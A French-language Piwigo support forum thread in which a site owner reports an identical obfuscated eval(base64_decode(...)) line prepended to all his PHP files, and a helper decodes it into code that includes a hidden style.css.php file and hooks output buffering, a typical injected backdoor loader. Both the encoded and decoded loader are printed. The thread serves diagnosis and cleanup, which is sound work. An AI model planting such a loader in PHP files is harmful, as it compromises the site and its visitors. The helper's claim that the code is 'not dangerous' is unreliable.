Piwigo.org

mtgt · 2010-01-09 07:20:23

Bonjour,

Je viens de m'apercevoir, en faisant des mises à jour, que tout les début de mes fichier php avait un code bizarre que je n'avais pas remarqué auparavant!
Lorsqu'on le retire, ça ne change absolument rien!

Code:

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL210Z3Q2OS9wdWJsaWNfaHRtbC92b3lhZ2UtYXVzdHJhbGllLW56L2FubnVhaXJlL2NsYXNzL2Zja2VkaXRvci9lZGl0b3IvZmlsZW1hbmFnZXIvYnJvd3Nlci9kZWZhdWx0L2ltYWdlcy9pY29ucy8zMi9zdHlsZS5jc3MucGhwJztpZihmaWxlX2V4aXN0cygkR0xPQkFMU1snbWZzbiddKSl7aW5jbHVkZV9vbmNlKCRHTE9CQUxTWydtZnNuJ10pO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJmZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>

Il sont tous identique!

Est ce quelqu'un peut me dire ce que c'est!
Sur mon www, j'ai tout enlevé manuellement mais sur Piwigo + tous ses plugins, ça fait beaucoup, et puis je risque d'en louper!

Que puis je faire? j'ai pensé renvoyer une archive de Piwigo sur mon serveur et la décompressé mais çà ne règlera pas le problème des plugins et des mods!

Un petit coup de main serait bienvenue.
Merci d'avance

Dernière modification par mtgt (2010-02-13 10:52:37)

VDigital · 2010-01-09 07:36:49

Ce qui traduit en php équivaut à...

if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home/mtgt69/public_html/voyage-australie-nz/annuaire/class/fckeditor/editor/filemanager/browser/default/images/icons/32/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

Je continue à décoder et je te poserai d'autres questions...

VDigital · 2010-01-09 07:38:51

P@t !!!!!!!!!!
fckeditor/editor/filemanager/browser/

Je lui envoie un mail.
Désolé.

A lui de voir, ce qu'il décide.
?

mtgt · 2010-01-09 07:40:04

Pour l'instant, c'est toujours aussi bizarre pour moi!
J'attends la suite, et je reste à ta disposition pour les questions!

Merci de regarder ça pour moi!

VDigital · 2010-01-09 07:42:29

A la réflexion je pense que ce n'est pas P@t qui en est responsable.
Mais une autre de tes applications.

voyage-australie-nz/annuaire/

annuaire ??? C'est quoi?

;-)

mtgt · 2010-01-09 07:44:47

http//annuaire.voyage-australie-nz.com

c'est l'annuaire lié au site (script freeglobes)

VDigital · 2010-01-09 07:44:56

Je n'ai pas écrit à P@t, fckeditor n'est pas en cause.

VDigital · 2010-01-09 07:47:26

Le truc est sensé ajouter une feuille de style sur tes modules php.
Mais c'est une m...
Je continue mon exploration.

VDigital · 2010-01-09 07:56:17

Copier/coller du contenu de
annuaire/class/fckeditor/editor/filemanager/browser/default/images/icons/32/style.css.php

J'ai encore besoin de comprendre ce truc
if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');

VDigital · 2010-01-09 08:09:37

default/images/icons/32 ???

mtgt · 2010-01-09 08:09:51

ça n' a pas l'air dangeureux , en fait! mais je me demande comment ça c'est collé de partout!

VDigital · 2010-01-09 08:11:49

http://www.voyage-australie-nz.com/annu … /icons/32/

Le contenu de style.css.php

VDigital · 2010-01-09 08:13:56

Ce n'est pas dangereux mais certainement assez pénalisant de modifier tous les php existants de ton site.
Pour quelle raison ?

Beaucoup de gens le perçoivent ni plus ni moins qu'un hack de leur site Cf. Google

VDigital · 2010-01-09 08:20:09

http://www.voyage-australie-nz.com/annuaire/class/
Annuaire utilise Smarty

Mais qui entre annuaire et fckeditor,
se croit autoriser à modifier le contenu des php existant?

Si tu regardes dans http://galerie.voyage-australie-nz.com/ … ql.inc.php
Je pense que tu pourrais ne pas apprécier la mauvaise plaisanterie.

mtgt · 2010-01-09 08:47:17

Je viens de suivre le chemin et j'ai trouvé un fichier plein de code incompréhensible pour moi!
Je les ai détruit et un grand nombre de fichier on disparu en même temps !!!

Je n'ai pu en récupéré que 3!
Puis je les mettre en pièces jointes?

Piwigo.org

Annonce

#1 2010-01-09 07:20:23

[Résolu] Code bizarre sur tous mes fichier PHP !

Code:

#2 2010-01-09 07:36:49

Re: [Résolu] Code bizarre sur tous mes fichier PHP !

#3 2010-01-09 07:38:51

Re: [Résolu] Code bizarre sur tous mes fichier PHP !

#4 2010-01-09 07:40:04

Re: [Résolu] Code bizarre sur tous mes fichier PHP !

#5 2010-01-09 07:42:29

Re: [Résolu] Code bizarre sur tous mes fichier PHP !

#6 2010-01-09 07:44:47

Re: [Résolu] Code bizarre sur tous mes fichier PHP !

#7 2010-01-09 07:44:56

Re: [Résolu] Code bizarre sur tous mes fichier PHP !

#8 2010-01-09 07:47:26

Re: [Résolu] Code bizarre sur tous mes fichier PHP !

#9 2010-01-09 07:56:17

Re: [Résolu] Code bizarre sur tous mes fichier PHP !

#10 2010-01-09 08:09:37

Re: [Résolu] Code bizarre sur tous mes fichier PHP !

#11 2010-01-09 08:09:51

Re: [Résolu] Code bizarre sur tous mes fichier PHP !

#12 2010-01-09 08:11:49

Re: [Résolu] Code bizarre sur tous mes fichier PHP !

#13 2010-01-09 08:13:56

Re: [Résolu] Code bizarre sur tous mes fichier PHP !

#14 2010-01-09 08:20:09

Re: [Résolu] Code bizarre sur tous mes fichier PHP !

#15 2010-01-09 08:47:17

Re: [Résolu] Code bizarre sur tous mes fichier PHP !

Pied de page des forums